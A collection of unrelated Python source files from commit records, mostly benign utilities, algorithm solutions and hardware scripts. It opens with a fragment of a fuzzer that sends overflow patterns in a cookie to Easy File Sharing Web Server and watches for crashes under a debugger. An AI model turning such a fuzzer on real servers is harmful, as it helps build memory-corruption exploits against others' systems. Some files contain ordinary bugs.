while self.pid is None:
time.sleep(1)
self.monitorThread = threading.Thread(target=self.monitor_debugger)
self.monitorThread.setDaemon(False)
self.monitorThread.start()
def monitor_debugger(self):
global Running
global OFFSET
test_words = 0
raw_input("[+] Please start the debugger...")
while Running and MAX_OFFSET>test_words:
with lock:
if not Running:
break
test_words += 100
OFFSET = test_words
print "[+] test %d words" % test_words
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
buffer = pattern_create(test_words)
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
s.send(httpreq)
s.close()
# prevent execute to fast.
time.sleep(1)
if not os.path.isfile(PICKLE_NAME):
print "[+] No found bug."
Running = False
self.dbg.terminate_process()
else:
print "[+] Find bug."
'''
Try to start debugger and run it.
'''
def start_debugger(self):
try:
self.dbg = pydbg()
self.dbg.load(self.exe_path)
self.pid = self.dbg.pid
except pdx:
print "[+] Can't open file, please check file path"
sys.exit(1)
except Exception as e:
print "[+] Unknow error: ", str(e)
sys.exit(1)
self.dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, check_access_validation)
self.dbg.run()
exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
Fuzzer(exe_path) | Python | 0.000001 | |
2199f4c5ed563200d555315b9a8575e00486e667 | Add a simple script to generate monthly confirmed / fixed counts | script/confirmed-fixed-monthly-breakdown.py | script/confirmed-fixed-monthly-breakdown.py | #!/usr/bin/python
# A script to draw graphs showing the number of confirmed reports
# created each month, and those of which that have been fixed. This
# script expects to find a file called 'problems.csv' in the current
# directory which should be generated by:
#
# DIR=`pwd` rake data:create_problem_spreadsheet
import csv
import datetime
from collections import defaultdict
import itertools
status_types = ('confirmed', 'fixed')
counts = {}
for status_type in status_types:
counts[status_type] = defaultdict(int)
today = datetime.date.today()
latest_month = earliest_month = (today.year, today.month)
maximum_count = -1
with open('problems.csv') as fp:
reader = csv.DictReader(fp, delimiter=',', quotechar='"')
for row in reader:
d = datetime.datetime.strptime(row['Created'],
'%H:%M %d %b %Y')
ym = (d.year, d.month)
earliest_month = min(earliest_month, ym)
if row['Status'] == 'confirmed':
counts['confirmed'][ym] += 1
elif row['Status'] == 'fixed':
counts['fixed'][ym] += 1
maximum_count = max(maximum_count, counts['fixed'][ym], counts['confirmed'][ym])
def months_between(earlier, later):
"""A generator for iterating over months represented as (year, month) tuples"""
year = earlier[0]
month = earlier[1]
while True:
yield (year, month)
if month == 12:
year = year + 1
month = 1
else:
month += 1
if (year, month) > later:
return
all_months = list(months_between(earliest_month, latest_month))
months = len(all_months)
# Make sure that there's at least a zero count for each month we're
# considering:
for d in counts.values():
for ym in all_months:
d[ym] += 0
with open('monthly-breakdown.csv', 'w') as fp:
writer = csv.writer(fp)
writer.writerow(['Month', 'Confirmed', 'Fixed'])
for ym in all_months:
writer.writerow(["%d-%02d" % (ym[0], ym[1]),
counts['confirmed'][ym],
counts['fixed'][ym]])
| Python | 0 | |
417f1832dbb6a1d0742b2f01d56429139f8885ef | add conversion script | scripts/conversionScripts/toValidationPP.py | scripts/conversionScripts/toValidationPP.py | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import xml.etree.ElementTree as ET
import xml.dom.minidom as pxml
import os
def convert(tree,fileName=None):
"""
Converts input files to be compatible with merge request #1583
Restructure the Validation PostProcessor, use the subType to indicate the algorithm
used by the Validation. Remove the specific node 'Probailistic'.
@ In, tree, xml.etree.ElementTree.ElementTree object, the contents of a RAVEN input file
@ In, fileName, the name for the raven input file
@Out, tree, xml.etree.ElementTree.ElementTree object, the modified RAVEN input file
"""
simulation = tree.getroot()
models = simulation.find('Models')
updateTestInfo = False
if models is not None:
postProcessors = models.findall('PostProcessor')
for pp in postProcessors:
subType = pp.get('subType')
if subType == 'Validation':
prob = pp.find('Probabilistic')
if prob is not None:
pp.set('subType', prob.tag.strip())
pp.remove(prob)
updateTestInfo = True
if updateTestInfo:
TestInfo = simulation.find('TestInfo')
if TestInfo is not None:
revisions = TestInfo.find('revisions')
hasRev = True
if revisions is None:
revisions = ET.Element('revisions')
hasRev = False
rev = ET.Element('revision')
rev.attrib['author'] = 'wangc'
rev.attrib['date'] = '2021-09-28'
rev.text = 'Convert Validation PostProcessor: subType will be replaced with the Probabilistic node tag, and Probabilistic node is removed'
revisions.append(rev)
if not hasRev:
TestInfo.append(revisions)
return tree
if __name__=='__main__':
import convert_utils
import sys
convert_utils.standardMain(sys.argv,convert)
| Python | 0.000001 | |
bbae3e9fee30634a659276732f16a883500e8f45 | Create memcache.py | cutout/cache/memcache.py | cutout/cache/memcache.py | # -*- coding: utf-8 -*-
import os
import re
import tempfile
from time import time
from .basecache import BaseCache
from .posixemulation import rename, _items
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
class MemCache(BaseCache):
"""Simple memory cache for single process environments. This class exists
mainly for the development server and is not 100% thread safe. It tries
to use as many atomic operations as possible and no locks for simplicity
but it could happen under heavy load that keys are added multiple times.
:param threshold: the maximum number of items the cache stores before
it starts deleting some.
:param default_timeout: the default timeout that is used if no timeout is
specified on :meth:`~BaseCache.set`.
"""
def __init__(self, threshold=500, default_timeout=300):
BaseCache.__init__(self, default_timeout)
self._cache = {}
self.clear = self._cache.clear
self._threshold = threshold
def _prune(self):
if len(self._cache) > self._threshold:
now = time()
for idx, (key, (expires, _)) in enumerate(self._cache.items()):
if expires <= now or idx % 3 == 0:
self._cache.pop(key, None)
def get(self, key):
now = time()
expires, value = self._cache.get(key, (0, None))
if expires > time():
return pickle.loads(value)
def set(self, key, value, timeout=None):
if timeout is None:
timeout = self.default_timeout
self._prune()
self._cache[key] = (time() + timeout, pickle.dumps(value,
pickle.HIGHEST_PROTOCOL))
def add(self, key, value, timeout=None):
if timeout is None:
timeout = self.default_timeout
if len(self._cache) > self._threshold:
self._prune()
item = (time() + timeout, pickle.dumps(value,
pickle.HIGHEST_PROTOCOL))
self._cache.setdefault(key, item)
def delete(self, key):
self._cache.pop(key, None)
| Python | 0.000001 | |
4fad6f5671d7957371db9d5bbdf9e65960a779b8 | output pairwise distances | pairdist.py | pairdist.py | #!/usr/bin/env python
"""Output pairwise distances between word vectors.
Prints lines with TAB-separated word indices (i, j) and the distance
of the corresponding word vectors under given metric.
Implementation avoids storing the distance matrix in memory, making
application to very large numbers of word vectors feasible.
Distances are assumed to be symmetric, either (i, j) or (j, i) is
included for any (i, j) pair, and self-distances (i, i) are excluded.
Indexing is zero-based by default.
The pairwise distances can be used e.g. as input for clustering tools.
"""
import sys
import logging
import numpy
import wvlib
from itertools import combinations, izip
from scipy.spatial import distance
# TODO: consider sklearn.neighbors.DistanceMetric if available
# selected distance metrics from scipy
metrics = {
'cosine' : distance.cosine,
'euclidean' : distance.euclidean,
'minkowski' : distance.minkowski,
# weighted Minkowski distance omitted, weight vector passing not implemented
'cityblock' : distance.cityblock,
'seuclidean' : distance.seuclidean,
'sqeuclidean' : distance.sqeuclidean,
'correlation' : distance.correlation,
'chebyshev' : distance.chebyshev,
'canberra' : distance.canberra,
'braycurtis' : distance.braycurtis,
'mahalanobis' : distance.mahalanobis,
# boolean vector distance metrics omitted, word vectors assumed continuous
# (hamming, jaccard, yule, matching, dice, kulsinski, rogerstanimoto,
# russellrao, sokalmichener, sokalsneath)
}
DEFAULT_METRIC='cosine'
def argparser():
try:
import argparse
except ImportError:
import compat.argparse as argparse
ap=argparse.ArgumentParser()
ap.add_argument('vectors', nargs=1, metavar='FILE', help='word vectors')
ap.add_argument('-i', '--min-index', default=0, type=int,
help='index of first word (default 0)')
ap.add_argument('-M', '--metric', default=DEFAULT_METRIC,
choices=sorted(metrics.keys()),
help='distance metric to apply')
ap.add_argument('-n', '--normalize', default=False, action='store_true',
help='normalize vectors to unit length')
ap.add_argument('-r', '--max-rank', metavar='INT', default=None,
type=int, help='only consider r most frequent words')
ap.add_argument('-w', '--whiten', default=False, action='store_true',
help='normalize features to unit variance ')
ap.add_argument('-W', '--words', default=False, action='store_true',
help='output words instead of indices')
return ap
def process_options(args):
options = argparser().parse_args(args)
if options.max_rank is not None and options.max_rank < 1:
raise ValueError('max-rank must be >= 1')
wv = wvlib.load(options.vectors[0], max_rank=options.max_rank)
if options.normalize:
logging.info('normalize vectors to unit length')
wv.normalize()
words, vectors = wv.words(), wv.vectors()
if options.whiten:
logging.info('normalize features to unit variance')
vectors = scipy.cluster.vq.whiten(vectors)
return words, vectors, options
def make_dist(vectors, options):
if options.metric != 'cosine':
return vectors, metrics[options.metric]
else:
# normalize once only
vectors = [v/numpy.linalg.norm(v) for v in vectors]
return vectors, lambda u, v: 1 - numpy.dot(u, v)
def main(argv=None):
if argv is None:
argv = sys.argv
try:
words, vectors, options = process_options(argv[1:])
except Exception, e:
if str(e):
print >> sys.stderr, 'Error: %s' % str(e)
return 1
else:
raise
m = options.min_index
vectors, dist = make_dist(vectors, options)
def index_str(i):
if not options.words:
return str(i)
else:
return words[i-m]
for i_j, v_u in izip(combinations(xrange(m, m+len(vectors)), 2),
combinations(vectors, 2)):
i, j, d = index_str(i_j[0]), index_str(i_j[1]), dist(v_u[0], v_u[1])
print '%s\t%s\t%f' % (i, j, d)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| Python | 0.999999 | |
295af615c00a7b783e90c6979eab9decab7c1979 | add strategy.crossover module (WIP) | zephyrus/strategy/crossover.py | zephyrus/strategy/crossover.py | import random
class Crossover:
def __init__(self, probability):
self.probability = probability
def execute(self, *solutions):
# TODO: validate solutions, 2, with len of at least 3
parent1, parent2 = solutions
offspring1 = parent1[:]
offspring2 = parent2[:]
if random.random() <= self.probability:
return self.foo(offspring1, offspring2)
return offspring1, offspring2
def foo(self, offspring1, offspring2):
raise NotImplementedError
class OnePointCrossover(Crossover):
def __init__(self, probability):
super().__init__(probability)
def foo(self, offspring1, offspring2):
index = random.randint(1, len(offspring1) - 2)
slice1, slice2 = offspring1[index:], offspring2[index:]
offspring1[index:] = slice2
offspring2[index:] = slice1
return offspring1, offspring2
class KPointCrossover(Crossover):
def __init__(self, probability, k):
super().__init__(probability)
self.k = k
def _partitions(self, n, size):
# TODO: size must be >= n
parts = []
while n > 1:
current = random.randint(1, size - n + 1)
parts.append(current)
n -= 1
size -= current
parts.append(size)
random.shuffle(parts)
slices = []
index = 0
for part in parts:
slices.append((index, index + part))
index += part
return slices
def foo(self, offspring1, offspring2):
slices = self._partitions(self.k + 1, len(offspring1))
for i, current_slice in enumerate(slices):
if i % 2 == 1:
start, end = current_slice
slice1 = offspring1[start:end]
slice2 = offspring2[start:end]
offspring2[start:end] = slice1
offspring1[start:end] = slice2
return offspring1, offspring2
class UniformCrossover(Crossover):
def __init__(self, probability, point_probability=0.5):
super().__init__(probability)
self.point_probability = point_probability
def foo(self, offspring1, offspring2):
for i in range(len(offspring1)):
if random.random() <= self.point_probability:
offspring1[i], offspring2[i] = offspring2[i], offspring1[i]
return offspring1, offspring2
"""
class SBXCrossover(Crossover):
def __init__(self, probability, distribution_index):
self.probability = probability
self.distribution_index = distribution_index
def execute(solutions):
parent1, parent2 = solutions
offspring1 = parent1[:]
offspring2 = parent2[:]
if random() <= self.probability:
for i in range(len(offspring)):
pass
return offspring1, offspring2
"""
def get_unbounder_beta_bar():
pass
def get_bounded_beta_bar(x1, x2, x_lower, x_upper, di):
beta = 1 + (2 / (x2 - x1)) * min((x1 - x_lower), (x_upper - x2))
alpha = 2 - pow(beta, -(di + 1))
u = random.random()
if u <= 1 / alpha:
return pow(alpha * u, 1 / (di + 1))
return pow(1 / (2 - alpha * u), 1 / (di + 1))
def unbounded_crossover(x1, x2, di):
x_lower, x_upper = None, None # Fix this
beta = 1 + (2 / (x2 - x1)) * min((x1 - x_lower), (x_upper - x2))
alpha = 2 - pow(beta, -(di + 1))
u = random.random()
if u <= .5:
beta_bar = pow(alpha * u, 1 / (di + 1))
else:
beta_bar = pow(1 / (2 - alpha * u), 1 / (di + 1))
y1 = .5 * ((x1 + x2) - beta_bar * abs(x2 - x1))
y2 = .5 * ((x1 + x2) + beta_bar * abs(x2 - x1))
return y1, y2
def bounded_crossover(x1, x2, x_lower, x_upper, di):
beta = 1 + (2 / (x2 - x1)) * min((x1 - x_lower), (x_upper - x2))
alpha = 2 - pow(beta, -(di + 1))
u = random.random()
if u <= 1 / alpha:
beta_bar = pow(alpha * u, 1 / (di + 1))
else:
beta_bar = pow(1 / (2 - alpha * u), 1 / (di + 1))
y1 = 0.5 * ((x1 + x2) - beta_bar * abs(x2 - x1))
y2 = 0.5 * ((x1 + x2) + beta_bar * abs(x2 - x1))
return y1, y2
if __name__ == '__main__':
solution1 = [1, 2, 3, 4, 5]
solution2 = [5, 6, 7, 8, 9]
crossover = OnePointCrossover(1)
print(crossover.execute(solution1, solution2))
crossover = UniformCrossover(1)
print(crossover.execute(solution1, solution2))
crossover = KPointCrossover(1, 3)
print(crossover.execute(solution1, solution2))
print(bounded_crossover(2, 2.4, 1, 4, 1))
print(bounded_crossover(2, 2.4, 1, 4, 2))
print(bounded_crossover(2, 2.4, 1, 4, 10))
print(bounded_crossover(2, 2.4, 1, 4, 100))
| Python | 0 | |
3719a0371fa6fcc95ca65b6d759762f1f17a16be | Solving p025 | p025.py | p025.py | """
What is the first term in the Fibonacci sequence to contain 1000 digits?
"""
def solve_p025():
for i, num in enumerate(fib_generator()):
if len(str(num)) == 1000:
return i + i
def fib_generator():
prev = 1
curr = 1
yield prev
yield curr
while True:
prev, curr = curr, prev + curr
yield curr
if __name__ == '__main__':
print solve_p025() | Python | 0.999768 | |
bd2a70930ba67f3dd510b172fe4e00ddc2dc23c2 | Create voxelmodel.py | odvm/voxelmodel.py | odvm/voxelmodel.py | from panda3d.core import *
from odvm.quads import Quads
class VoxelModel(Geom):
def __init__(self):
Geom.__init__( self, GeomVertexData( 'vertices', GeomVertexFormat.get_v3n3c4(), Geom.UH_static ) )
self.quads = Quads(self)
self.add_primitive(self.quads)
def add(self,p2s,i,j,k,c,p2i=0,p2j=0,p2k=0):
di = 1 << p2i
dj = 1 << p2j
dk = 1 << p2k
self.quads.add( 1<<p2s,i,j,k,
( ( ( 0, 0, 0, di, dj, 0 ), c ),
( ( 0, 0,-dk, 0, dj, 0 ), c ),
( ( di, 0, 0, di, dj,-dk ), c ),
( ( 0, 0,-dk, di, 0, 0 ), c ),
( ( 0, dj,-dk, di, 0,-dk ), c ),
( ( 0, dj, 0, di, dj,-dk ), c ) ) )
| Python | 0.000002 | |
b4d82c21995fb2b9e2afd93eea8849ded8b7d489 | Update next-greater-element-iii.py | Python/next-greater-element-iii.py | Python/next-greater-element-iii.py | # Time: O(logn) = O(1)
# Space: O(logn) = O(1)
# Given a positive 32-bit integer n, you need to find the smallest 32-bit integer
# which has exactly the same digits existing in the integer n and is greater in value than n.
# If no such positive 32-bit integer exists, you need to return -1.
@
# Example 1:
# Input: 12
# Output: 21
# Example 2:
# Input: 21
# Output: -1
class Solution(object):
def nextGreaterElement(self, n):
"""
:type n: int
:rtype: int
"""
digits = map(int, list(str(n)))
k, l = -1, 0
for i in xrange(len(digits) - 1):
if digits[i] < digits[i + 1]:
k = i
if k == -1:
digits.reverse()
return -1
for i in xrange(k + 1, len(digits)):
if digits[i] > digits[k]:
l = i
digits[k], digits[l] = digits[l], digits[k]
digits[k + 1:] = digits[:k:-1]
result = int("".join(map(str, digits)))
return -1 if result >= 0x7FFFFFFF else result
| # Time: O(logn)
# Space: O(logn)
# Given a positive 32-bit integer n, you need to find the smallest 32-bit integer
# which has exactly the same digits existing in the integer n and is greater in value than n.
# If no such positive 32-bit integer exists, you need to return -1.
@
# Example 1:
# Input: 12
# Output: 21
# Example 2:
# Input: 21
# Output: -1
class Solution(object):
def nextGreaterElement(self, n):
"""
:type n: int
:rtype: int
"""
digits = map(int, list(str(n)))
k, l = -1, 0
for i in xrange(len(digits) - 1):
if digits[i] < digits[i + 1]:
k = i
if k == -1:
digits.reverse()
return -1
for i in xrange(k + 1, len(digits)):
if digits[i] > digits[k]:
l = i
digits[k], digits[l] = digits[l], digits[k]
digits[k + 1:] = digits[:k:-1]
result = int("".join(map(str, digits)))
return -1 if result >= 0x7FFFFFFF else result
| Python | 0.000007 |
c6af2c9f11204dde361a9b1f8b14113e90a272b3 | add py prototype | 1/hazi.py | 1/hazi.py | #!/usr/bin/env python
import sys, codecs
class Node:
def __init__(self, name, g, h):
self.name = name
self.f = g + h
self.g = g
self.h = h
def sort_node(a, b):
return cmp(a.f, b.f)
def name_in_list(y, l):
for i in l:
if y == i.name:
return True
return False
def node_from_list(y, l):
for i in l:
if y == i.name:
return i
def reconstruct_path(came_from,current_node):
if current_node in came_from.keys():
p = reconstruct_path(came_from,came_from[current_node])
return p + [current_node]
else:
return [current_node]
def a_star(start, end):
sock = codecs.open("output.txt", "w", "ISO-8859-2")
openlist = [Node(start, 0, hn[start])]
closedlist = []
count = 0
while len(openlist):
openlist.sort(cmp=sort_node)
sock.write("(:openlist %s" % count)
for i in openlist:
sock.write(" (%s %s)" % (i.f, i.name))
sock.write(")\n")
sock.write("(:closedlist %s" % count)
for i in closedlist:
sock.write(" (%s %s)" % (i.f, i.name))
sock.write(")\n")
x = openlist.pop(0)
if x.name == end:
sock.write("(:sol %s " % x.f)
sock.write(" ".join(reconstruct_path(came_from,end)))
sock.write(")\n")
return True
closedlist.append(x)
for y in gn[x.name].keys():
if name_in_list(y, closedlist):
continue
tentative_g_score = x.g + gn[x.name][y]
tentative_is_better = False
if not name_in_list(y, openlist):
openlist.append(Node(y, tentative_g_score, hn[y]))
tentative_is_better = True
elif tentative_g_score < node_from_list(y, openlist).g:
tentative_is_better = True
if tentative_is_better == True:
came_from[y] = x.name
count += 1
return False
inhn = False
ingn = False
start = None
end = None
hn = {}
gn = {}
came_from = {}
sock = codecs.open(sys.argv[1], "r", "ISO-8859-2")
for i in sock.readlines():
line = i.strip()
if line.startswith("(:start"):
start = line[8:-1]
elif line.startswith("(:end"):
end = line[6:-1]
elif line.startswith("(:hn"):
inhn = True
elif line.startswith("(:gn"):
ingn = True
elif line.startswith("("):
if inhn:
items = line[1:-1].split(' ')
hn[items[0]] = int(items[1])
elif ingn:
items = line[1:-1].split(' ')
if items[0] not in gn.keys():
gn[items[0]] = {}
gn[items[0]][items[1]] = int(items[2])
elif line.startswith(")"):
if inhn:
inhn = False
elif ingn:
ingn = False
sock.close()
a_star(start, end)
| Python | 0 | |
d9ed78369e21b79e022e685ecb39babbb0c17315 | Create test_lcd.py | Raspberry_py/test_lcd.py | Raspberry_py/test_lcd.py | #!/usr/bin/python
#import
import RPi.GPIO as GPIO
import time
# Define GPIO to LCD mapping
LCD_RS = 7
LCD_E = 8
LCD_D4 = 25
LCD_D5 = 24
LCD_D6 = 23
LCD_D7 = 18
# Define some device constants
LCD_WIDTH = 16 # Maximum characters per line
LCD_CHR = True
LCD_CMD = False
LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
# Timing constants
E_PULSE = 0.0005
E_DELAY = 0.0005
def main():
# Main program block
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
GPIO.setup(LCD_E, GPIO.OUT) # E
GPIO.setup(LCD_RS, GPIO.OUT) # RS
GPIO.setup(LCD_D4, GPIO.OUT) # DB4
GPIO.setup(LCD_D5, GPIO.OUT) # DB5
GPIO.setup(LCD_D6, GPIO.OUT) # DB6
GPIO.setup(LCD_D7, GPIO.OUT) # DB7
# Initialise display
lcd_init()
while True:
# Send some test
lcd_string("................",LCD_LINE_1)
lcd_string("................",LCD_LINE_2)
time.sleep(4)
lcd_string(" Rob-Bat OK ",LCD_LINE_1)
time.sleep(3)
lcd_string(" Funcionando! ",LCD_LINE_2)
time.sleep(3)
lcd_string("Computando......",LCD_LINE_1)
lcd_string("................",LCD_LINE_2)
time.sleep(2)
lcd_string(" ESTOY VIVO !! ",LCD_LINE_1)
lcd_string("----------------",LCD_LINE_2)
time.sleep(10);
def lcd_init():
# Initialise display
lcd_byte(0x33,LCD_CMD) # 110011 Initialise
lcd_byte(0x32,LCD_CMD) # 110010 Initialise
lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction
lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off
lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size
lcd_byte(0x01,LCD_CMD) # 000001 Clear display
time.sleep(E_DELAY)
def lcd_byte(bits, mode):
# Send byte to data pins
# bits = data
# mode = True for character
# False for command
GPIO.output(LCD_RS, mode) # RS
# High bits
GPIO.output(LCD_D4, False)
GPIO.output(LCD_D5, False)
GPIO.output(LCD_D6, False)
GPIO.output(LCD_D7, False)
if bits&0x10==0x10:
GPIO.output(LCD_D4, True)
if bits&0x20==0x20:
GPIO.output(LCD_D5, True)
if bits&0x40==0x40:
GPIO.output(LCD_D6, True)
if bits&0x80==0x80:
GPIO.output(LCD_D7, True)
# Toggle 'Enable' pin
lcd_toggle_enable()
# Low bits
GPIO.output(LCD_D4, False)
GPIO.output(LCD_D5, False)
GPIO.output(LCD_D6, False)
GPIO.output(LCD_D7, False)
if bits&0x01==0x01:
GPIO.output(LCD_D4, True)
if bits&0x02==0x02:
GPIO.output(LCD_D5, True)
if bits&0x04==0x04:
GPIO.output(LCD_D6, True)
if bits&0x08==0x08:
GPIO.output(LCD_D7, True)
# Toggle 'Enable' pin
lcd_toggle_enable()
def lcd_toggle_enable():
# Toggle enable
time.sleep(E_DELAY)
GPIO.output(LCD_E, True)
time.sleep(E_PULSE)
GPIO.output(LCD_E, False)
time.sleep(E_DELAY)
def lcd_string(message,line):
# Send string to display
message = message.ljust(LCD_WIDTH," ")
lcd_byte(line, LCD_CMD)
for i in range(LCD_WIDTH):
lcd_byte(ord(message[i]),LCD_CHR)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
finally:
lcd_byte(0x01, LCD_CMD)
lcd_string("Goodbye!",LCD_LINE_1)
GPIO.cleanup()
| Python | 0.000004 | |
f30c542a9714574dbcee15ca7f7b4ca4cdb9d965 | add atexit01.py | trypython/stdlib/atexit01.py | trypython/stdlib/atexit01.py | # coding: utf-8
"""
atexitモジュールについてのサンプルです。
"""
import atexit
import sys
from trypython.common.commoncls import SampleBase
from trypython.common.commonfunc import pr
class Sample(SampleBase):
def exec(self):
#
# atexitモジュールを利用するとシャットダウンフックを設定出来る
# register() で登録して、 unregister() で解除する
#
# 引数無しの関数に限り、@atexit.register という風にデコレータで
# 指定できる。
#
atexit.register(Sample.exit_hook)
pr('script', 'end')
sys.exit(0)
@staticmethod
def exit_hook():
pr('exit_hook', 'called')
@staticmethod
@atexit.register
def exit_hook2():
pr('exit_hook2', 'called')
def go():
obj = Sample()
obj.exec()
if __name__ == '__main__':
go()
| Python | 0.000001 | |
926fe25c4995b5ab1d2464159223e2c403b72570 | use python command line tool with tshark to parse pcap and convert to csv | pcap2csv.py | pcap2csv.py | import os
import csv
cmd = "tshark -n -r {0} -T fields -Eheader=y -e ip.addr > tmp.csv"
os.system(cmd.format("wireshark_sample.pcap"))
result = []
with open("tmp.csv", "r") as infile:
for line in infile:
if line == "\n":
continue
else:
result.append(line.strip().split(","))
with open('sample.csv', 'wb') as csvfile:
writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
for line in result:
writer.writerow(line)
os.system("rm tmp.csv") | Python | 0.000001 | |
81f4976645225b6cf4a422186a3419a06756bfc5 | add a set of test utils that will be useful for running tests | test/test_util.py | test/test_util.py | import contextlib
import os
import os.path
import mock
import requests
@contextlib.contextmanager
def mocked_requests(path):
"""mocks the requests library to return a given file's content"""
# if environment variable is set, then don't mock the tests just grab files
# over the network. Example:
# env ULMO_DONT_MOCK_TESTS=1 py.test
if os.environ.get('ULMO_DONT_MOCK_TESTS', False):
yield
else:
test_path = test_file_path(path)
with open(test_path, 'rb') as f:
mock_response = requests.Response()
mock_response.status_code = 200
mock_response.raw = f
with mock.patch('requests.get', return_value=mock_response):
yield
def test_file_path(file_path):
"""translates a file path to be relative to the test files directory"""
return os.path.join(os.path.dirname(__file__), 'files', file_path)
| Python | 0.000009 | |
0827fce61013172fa7183ee294189275030c0faf | Create code_5.py | MPI_Practice_Examples/code_5.py | MPI_Practice_Examples/code_5.py | #dotProductParallel_1.py
#"to run" syntax example: mpiexec -n 4 python26 dotProductParallel_1.py 40000
from mpi4py import MPI
import numpy
import sys
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
#read from command line
n = int(sys.argv[1]) #length of vectors
#arbitrary example vectors, generated to be evenly divided by the number of
#processes for convenience
x = numpy.linspace(0,100,n) if comm.rank == 0 else None
y = numpy.linspace(20,300,n) if comm.rank == 0 else None
#initialize as numpy arrays
dot = numpy.array([0.])
local_n = numpy.array([0])
#test for conformability
if rank == 0:
if (n != y.size):
print "vector length mismatch"
comm.Abort()
#currently, our program cannot handle sizes that are not evenly divided by
#the number of processors
if(n % size != 0):
print "the number of processors must evenly divide n."
comm.Abort()
#length of each process's portion of the original vector
local_n = numpy.array([n/size])
#communicate local array size to all processes
comm.Bcast(local_n, root=0)
#initialize as numpy arrays
local_x = numpy.zeros(local_n)
local_y = numpy.zeros(local_n)
#divide up vectors
comm.Scatterv([x,(0,100,n),MPI.DOUBLE], local_x)
comm.Scatterv([y, (20,300,n), MPI.DOUBLE] local_y)
#local computation of dot product
local_dot = numpy.array([numpy.dot(local_x, local_y)])
#sum the results of each
comm.Reduce(local_dot, local_n, op = MPI.SUM)
if (rank == 0):
print "The dot product is", dot[0], "computed in parallel"
print "and", numpy.dot(x,y), "computed serially"
| Python | 0.001674 | |
6454548da01dbc2b9f772a5c0ffb11a03dc933e7 | Add module capable of rendering a circle when ran | draw_shape.py | draw_shape.py | import pygame
pygame.init()
#-- SCREEN CHARACTERISTICS ------------------------->>>
background_color = (255,255,255)
(width, height) = (300, 200)
#-- RENDER SCREEN ---------------------------------->>>
screen = pygame.display.set_mode((width, height))
screen.fill(background_color)
#pygame.draw.circle(canvas, color, position(x,y), radius, thickness)
pygame.draw.circle(screen, (255,0,0), (150, 100), 10, 1)
#-- RUN LOOP --------------------------------------->>>
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
| Python | 0 | |
469b28aec45c9832e4cfe658143316fb15e103d1 | Add server | server.py | server.py | print("Hola mundo")
| Python | 0.000001 | |
6ac6f9f3f933a98af8722561ba181ca50c6ad1fe | Add performance test | perftest.py | perftest.py | import resource
from time import clock
from sortedsets import SortedSet
def test(size):
tm = clock()
ss = SortedSet((str(i), i*10) for i in range(size))
create_time = clock() - tm
print("SORTED SET WITH", size, "ELEMENTS", ss._level, "LEVELS")
print("Memory usage", resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
print("Creation time ", format(create_time, '10.2f'), "s")
num = 1000
step = size // (num + 2)
items = []
for i in range(step, size-step, step):
items.append((str(i), i*10))
tm = clock()
for k, v in items:
del ss[k]
del_time = num/(clock() - tm)
tm = clock()
for k, v in items:
ss[k] = v
ins_time = num/(clock() - tm)
print("Insertion speed", format(ins_time, '10.2f'), "ins/s")
print("Deletion speed ", format(del_time, '10.2f'), "del/s")
for size in (10000, 100000, 1000000, 10000000):
test(size)
| Python | 0.000043 | |
a107d3c088e13c4bf1a600f0ebf2664321d6799f | add solution for Binary Tree Maximum Path Sum | src/binaryTreeMaximumPathSum.py | src/binaryTreeMaximumPathSum.py | # Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return an integer
def maxPathSum(self, root):
self.res = root.val if root else 0
self.dfs(root)
return self.res
def dfs(self, root):
if root is None:
return 0
l_max = max(0, self.dfs(root.left))
r_max = max(0, self.dfs(root.right))
self.res = max(self.res, root.val+l_max+r_max)
return root.val+max(l_max, r_max)
| Python | 0.000001 | |
4fdef464be6eabee609ecc4327493c277693c0e0 | Make content text mandatory | content/migrations/0023_auto_20160614_1130.py | content/migrations/0023_auto_20160614_1130.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-14 09:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('content', '0022_auto_20160608_1407'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='text',
field=models.TextField(verbose_name='Text'),
),
migrations.AlterField(
model_name='content',
name='text',
field=models.TextField(verbose_name='Text'),
),
]
| Python | 0.999999 | |
b106bb6f346811181c9fde27147f7b1685827cbe | 436. Find Right Interval. Brute force | p436_bruteforce.py | p436_bruteforce.py | import sys
import unittest
# Definition for an interval.
class Interval(object):
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution(object):
def findRightInterval(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[int]
"""
result = []
for i in xrange(len(intervals)):
min_index = -1
